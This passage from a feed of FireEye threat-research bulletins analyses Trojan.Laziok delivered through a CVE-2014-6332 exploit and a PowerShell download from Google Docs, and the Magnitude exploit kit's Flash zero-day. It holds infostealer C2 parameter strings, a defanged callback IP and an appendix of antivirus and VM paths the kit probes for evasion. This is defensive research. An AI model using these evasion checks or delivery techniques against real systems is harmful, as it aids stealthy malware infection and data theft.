The combination of CVE-2014-6332 with this GodMode abuse has been in use since late 2014 via a known PoC[ii], as seen in Figures 2a and 2b:\n\nFigure 2a. CVE-2014-6332 usage\n\nFigure 2b. Function call to runmumaa() after \u201cGodMode\u201d access, changing the safemode flags\n\nNext, the runmumaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell is used to download the malware and execute it from the path in the %APPDATA% environment variable via DownloadFile and ShellExecute calls. All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape(...)), shown in Figure 1.\n\nPowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly into memory. We have previously discussed [active PowerShell data stealing campaigns from Russia](<https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html>)[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs \u2013 seen in Figure 3 showing the de-obfuscated code \u2013 fetched live malware for victims who ended up on the aforementioned Polish website.\n\nFigure 3. 
Using PowerShell to fetch payload hosted on Google docs link\n\n##### **Payload Details**\n\nThe downloaded payload is infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:\n\n00406471 PUSH 21279964.00414EED ASCII \"open\" \n0040649C MOV EDX,21279964.004166A8 ASCII \"idcontact.php?COMPUTER=\" \n004064B1 MOV EDX,21279964.00415D6D ASCII \"&steam=\" \n004064D2 MOV EDX,21279964.00416D96 ASCII \"&origin=\" \n004064F3 MOV EDX,21279964.00416659 ASCII \"&webnavig=\" \n00406514 MOV EDX,21279964.00416B17 ASCII \"&java=\" \n00406535 MOV EDX,21279964.00415601 ASCII \"&net=\" \n00406556 MOV EDX,21279964.00414F76 ASCII \"&memoireRAMbytes=\" \n0040656B MOV EDX,21279964.0041628C ASCII \"&diskhard=\" \n0040658E MOV EDX,21279964.00414277 ASCII \"&avname=\" \n004065AF MOV EDX,21279964.00416BFC ASCII \"&parefire=\" \n004065D0 MOV EDX,21279964.0041474A ASCII \"&install=\" \n004065E5 MOV EDX,21279964.00414E12 ASCII \"&gpu=\" \n00406606 MOV EDX,21279964.004164B7 ASCII \"&cpu=\" \n00406659 MOV EDX,21279964.004170F9 ASCII \"bkill.php\" \n004066B9 MOV EDX,21279964.00415B79 ASCII \"0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75\" \n004066ED MOV EDX,21279964.004149CD ASCII \"install_info.php\" \n00406735 MOV EDX,21279964.00415951 ASCII \"pinginfo.php\" \n00406772 MOV EDX,21279964.00416B6B ASCII \"get.php?IP=\" \n00406787 MOV EDX,21279964.0041463F ASCII \"&COMPUTER=\" \n0040679C MOV EDX,21279964.00416DF5 ASCII \"&OS=\" \n004067B1 MOV EDX,21279964.00415CB8 ASCII \"&COUNTRY=\" \n004067C6 MOV EDX,21279964.00416069 ASCII \"&HWID=\" \n004067DB MOV EDX,21279964.00414740 ASCII \"&INSTALL=\" \n004067F0 MOV EDX,21279964.00415BE3 ASCII \"&PING=\" \n00406805 MOV EDX,21279964.004158E2 ASCII \"&INSTAL=\" \n0040681A MOV EDX,21279964.00414D3E ASCII \"&V=\" \n0040682F MOV EDX,21279964.00414E5D ASCII \"&Arch=\" \n00406872 MOV EDX,21279964.00414166 ASCII \"post.php\" \n00406899 MOV EDX,21279964.00414EB0 ASCII \"*0\"\n\nAbove instructions 
of the payload, when unpacked, highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about the computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to a path that mimics well-known folders and process names, such as:\n\nC:\\Documents and Settings\\admin\\Application Data\\System\\Oracle\\smss.exe\n\nThe payload attempts to call back to a known bad Polish server, [hxxp://]193.189.117[.]36.\n\nWe observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google\u2019s security checks. Following our notification, Google promptly removed the malicious file and it can no longer be fetched.\n\n##### **Conclusion**\n\nFireEye\u2019s multi-flow detection mechanism catches this at every level, from the point of entry to the callback \u2013 and the malware is not able to bypass FireEye sandbox security. PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful regarding the policy and regulation of PowerShell usage \u2013 especially since the abuse can involve some trusted sources that sometimes have exemptions, with whitelists from some security vendors being one example. Or they can keep using FireEye. 
\n\n\n[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector \n[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ \n[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html\n", "cvss3": {}, "published": "2016-04-21T17:45:00", "type": "fireeye", "title": "PowerShell used for spreading Trojan.Laziok through Google Docs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2014-6332"], "modified": "2016-04-21T17:45:00", "id": "FIREEYE:E9E6074E1BE7D5905706DE1C69AFDCDE", "href": "https://www.fireeye.com/blog/threat-research/2016/04/powershell_used_for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:19", "description": "##### **Introduction**\n\nThrough our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. 
After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.\n\n##### **The Payload**\n\nTrojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.\n\nThe delivery technique in this case exploits users running versions of Internet Explorer that support VBScript.\n\n##### **Attack Delivery Point**\n\nThe attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean.cba[.]pl/lean/.\n\n\n\nFigure 1. Obfuscated code shown in the response\n\nOnce decoded, the JavaScript unpacks and runs an exploit for CVE-2014-6332 through VBScript execution in Internet Explorer (versions 3 to 11). The exploit abuses the memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation to bypass operating system security utilities and other protections, giving the attacker\u2019s script what is known as \u201cGodMode\u201d. The combination of CVE-2014-6332 and GodMode abuse has been in use since late 2014 via a known PoC[ii], as seen in Figures 2a and 2b:\n\n\n\nFigure 2a. CVE-2014-6332 usage\n\n\n\nFigure 2b. Function call to runmumaa() after \u201cGodMode\u201d access changing the safemode flags\n\nNext, the runmumaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell downloads the malware to a path under the %APPDATA% environment variable and executes it via the DownloadFile and ShellExecute calls. 
All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape), shown in Figure 1.\n\nPowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly into memory. We have previously discussed [active PowerShell data stealing campaigns from Russia](<https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html>)[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs \u2013 seen in Figure 3 showing the de-obfuscated code \u2013 fetched live malware for victims who ended up on the aforementioned Polish website.\n\n\n\nFigure 3. Using PowerShell to fetch the payload hosted on a Google Docs link\n\n##### **Payload Details**\n\nThe downloaded payload is the infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:\n\n00406471 PUSH 21279964.00414EED ASCII \"open\" \n0040649C MOV EDX,21279964.004166A8 ASCII \"idcontact.php?COMPUTER=\" \n004064B1 MOV EDX,21279964.00415D6D ASCII \"&steam=\" \n004064D2 MOV EDX,21279964.00416D96 ASCII \"&origin=\" \n004064F3 MOV EDX,21279964.00416659 ASCII \"&webnavig=\" \n00406514 MOV EDX,21279964.00416B17 ASCII \"&java=\" \n00406535 MOV EDX,21279964.00415601 ASCII \"&net=\" \n00406556 MOV EDX,21279964.00414F76 ASCII \"&memoireRAMbytes=\" \n0040656B MOV EDX,21279964.0041628C ASCII \"&diskhard=\" \n0040658E MOV EDX,21279964.00414277 ASCII \"&avname=\" \n004065AF MOV EDX,21279964.00416BFC ASCII \"&parefire=\" \n004065D0 MOV EDX,21279964.0041474A ASCII \"&install=\" \n004065E5 MOV EDX,21279964.00414E12 ASCII \"&gpu=\" \n00406606 MOV EDX,21279964.004164B7 ASCII \"&cpu=\" \n00406659 MOV EDX,21279964.004170F9 ASCII \"bkill.php\" \n004066B9 MOV EDX,21279964.00415B79 ASCII \"0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75\" \n004066ED MOV 
EDX,21279964.004149CD ASCII \"install_info.php\" \n00406735 MOV EDX,21279964.00415951 ASCII \"pinginfo.php\" \n00406772 MOV EDX,21279964.00416B6B ASCII \"get.php?IP=\" \n00406787 MOV EDX,21279964.0041463F ASCII \"&COMPUTER=\" \n0040679C MOV EDX,21279964.00416DF5 ASCII \"&OS=\" \n004067B1 MOV EDX,21279964.00415CB8 ASCII \"&COUNTRY=\" \n004067C6 MOV EDX,21279964.00416069 ASCII \"&HWID=\" \n004067DB MOV EDX,21279964.00414740 ASCII \"&INSTALL=\" \n004067F0 MOV EDX,21279964.00415BE3 ASCII \"&PING=\" \n00406805 MOV EDX,21279964.004158E2 ASCII \"&INSTAL=\" \n0040681A MOV EDX,21279964.00414D3E ASCII \"&V=\" \n0040682F MOV EDX,21279964.00414E5D ASCII \"&Arch=\" \n00406872 MOV EDX,21279964.00414166 ASCII \"post.php\" \n00406899 MOV EDX,21279964.00414EB0 ASCII \"*0\"\n\nThe instructions above, from the unpacked payload, highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about the computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to a path that mimics well-known folders and process names, such as:\n\nC:\\Documents and Settings\\admin\\Application Data\\System\\Oracle\\smss.exe\n\nThe payload attempts to call back to a known bad Polish server, [hxxp://]193.189.117[.]36.\n\nWe observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google\u2019s security checks. 
Following our notification, Google promptly removed the malicious file and it can no longer be fetched.\n\n##### **Conclusion**\n\nFireEye\u2019s multi-flow detection mechanism catches this at every level, from the point of entry to the callback \u2013 and the malware is not able to bypass FireEye sandbox security. PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful regarding the policy and regulation of PowerShell usage \u2013 especially since the abuse can involve some trusted sources that sometimes have exemptions, with whitelists from some security vendors being one example. Or they can keep using FireEye. \n\n\n[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector \n[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ \n[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html\n", "edition": 2, "cvss3": {}, "published": "2016-04-21T13:45:00", "type": "fireeye", "title": "PowerShell used for spreading Trojan.Laziok through Google Docs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2012-0158"], "modified": "2016-04-21T13:45:00", "id": "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "href": "https://www.fireeye.com/blog/threat-research/2016/04/powershell_used_for.html", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:19", "description": "On April 2, security researcher @Kafeine at Proofpoint [discovered a change to the Magnitude Exploit Kit](<https://www.proofpoint.com/us/threat-insight/post/killing-zero-day-in-the-egg>). Thanks to their collaboration, we analyzed the sample and discovered that Magnitude EK was exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-1019). The in-the-wild exploit achieves remote code execution on recent versions of Flash Player, but fails on the latest version (21.0.0.197).\n\nWhile version 21.0.0.197 is vulnerable to this exploit, execution fails because Adobe introduced new exploit mitigations in version 21.0.0.182 of Flash Player. This was a great move from Adobe that shows how valuable innovations into exploit mitigations can be. Before the exploit kit authors could devise a way around the new mitigations, Adobe patched the underlying vulnerability.\n\n##### Exploit Delivery Chain \n\n\nMagnitude EK recently updated its delivery chain. It added a profile gate, just like Angler EK, which collects the screen\u2019s dimensions and color depth (Figure 1).\n\n\n\nFigure 1. JS of Profile Gate\n\nThe server responds with another profiling page, which tries to avoid sending exploits to users browsing from virtual machines or with certain antivirus programs installed (Figure 2). See the appendix for the full list of checks performed.\n\n\n\nFigure 2. JS of redirecting to main exploit page\n\nIn our tests, Magnitude EK delivered the JSON double free exploit (CVE-2015-2419) and a small Flash loader that renders the new Flash exploit (Figure 3).\n\n\n\nFigure 3. JS of loading exploits\n\n##### The Flash Exploit\n\nA memory corruption vulnerability exists in an undocumented ASnative API. The exploit causes the flash memory allocator to allocate buffers under the attacker\u2019s control. 
The attacker can then create a ByteArray of length 0xFFFFFFFF such that it can read and write arbitrary memory, as seen in Figure 4. The exploit\u2019s code layout and some of the functionalities are similar to the leaked HackingTeam exploits, in that it downloads malware from another server and executes it.\n\n\n\nFigure 4. ActionScript of Flash exploits\n\n##### Conclusion\n\nThis is not the first time that new exploit mitigation research rendered an in-the-wild zero-day exploit ineffective. Exploit mitigations are an invaluable tool for the industry, and their ongoing development within some of the most widely targeted applications \u2013 such as Internet Explorer/Edge and Flash Player \u2013 change the game.\n\nDespite regular security updates, attackers continue to target Flash Player, primarily because of its ubiquity and cross-platform reach. If Flash Player is required in your environment, ensure that you update to the latest version, and consider the use of mitigation tools such as [EMET](<https://support.microsoft.com/en-us/kb/2458544>) from Microsoft. \n \nClick [here](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>) for the security bulletin issued by Adobe.\n\n##### Acknowledgements\n\nA huge thank you to @Kafeine, without whom this discovery would not be possible. 
His diligence continues to keep this industry at pace with exploit kit authors around the world.\n\n##### Appendix\n\nres://\\Program%20Files%20(x86)\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files\\Fiddler2\\Fiddler.exe/#3/#32512 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567 \nres://\\Program%20Files%20(x86)\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996 \nres://\\Program%20Files%20(x86)\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110 \nres://\\Program%20Files%20(x86)\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 
\nres://\\Program%20Files\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky 
Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky 
Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 
\nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-07T08:30:00", "type": "fireeye", "title": "CVE-2016-1019: A New Flash Exploit Included in Magnitude Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2015-2419"], "modified": "2016-04-07T08:30:00", "id": "FIREEYE:1A61A821CE69D378830204326B2E938C", "href": "https://www.fireeye.com/blog/threat-research/2016/04/cve-2016-1019_a_new.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:48", "description": "On April 2, security researcher @Kafeine at Proofpoint [discovered a change to the Magnitude Exploit Kit](<https://www.proofpoint.com/us/threat-insight/post/killing-zero-day-in-the-egg>). Thanks to their collaboration, we analyzed the sample and discovered that Magnitude EK was exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-1019). The in-the-wild exploit achieves remote code execution on recent versions of Flash Player, but fails on the latest version (21.0.0.197).\n\nWhile version 21.0.0.197 is vulnerable to this exploit, execution fails because Adobe introduced new exploit mitigations in version 21.0.0.182 of Flash Player. This was a great move from Adobe that shows how valuable innovations into exploit mitigations can be. Before the exploit kit authors could devise a way around the new mitigations, Adobe patched the underlying vulnerability.\n\n##### Exploit Delivery Chain \n\n\nMagnitude EK recently updated its delivery chain. It added a profile gate, just like Angler EK, which collects the screen\u2019s dimensions and color depth (Figure 1).\n\n\n\nFigure 1. JS of Profile Gate\n\nThe server responds with another profiling page, which tries to avoid sending exploits to users browsing from virtual machines or with certain antivirus programs installed (Figure 2). See the appendix for the full list of checks performed.\n\n\n\nFigure 2. 
